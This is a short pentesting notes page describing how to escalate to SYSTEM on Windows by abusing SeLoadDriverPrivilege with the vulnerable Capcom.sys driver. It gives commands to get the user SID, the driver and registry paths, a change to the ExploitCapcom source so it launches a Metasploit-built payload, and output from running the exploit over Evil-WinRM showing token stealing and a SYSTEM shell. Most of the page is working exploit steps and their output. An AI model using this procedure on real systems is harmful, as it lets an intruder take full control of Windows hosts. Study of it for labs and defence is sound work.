SeLoadDriverPrivilege

Methodology using PS and visual studio:

Obtain user SID

Get-ADUser -Identity 'USER' | select SID
[OR]
(New-Object System.Security.Principal.NTAccount("USER")).Translate([System.Security.Principal.SecurityIdentifier]).value

Set vars

PCWSTR pPathSource = L"C:\\experiments\\privileges\\Capcom.sys";
PCWSTR pPathSourceReg = L"\\Registry\\User\\<User-SID>\\System\\CurrentControlSet\\MyService";

Github Repo: https://github.com/tandasat/ExploitCapcom/

# cloned in vs-code
# file ExploitCapcom.cpp
# line 410
TCHAR CommandLine[] = TEXT("C:\\kashz\\kashz.exe");
Build Solution > ExploitCapcom.exe

# build and generate kashz.exe using msf

Run

*Evil-WinRM* PS C:\kashz> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 0000024737490008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

Reference:

https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges#seloaddriverprivilege

PrevioussmbGhost

Last updated 4 years ago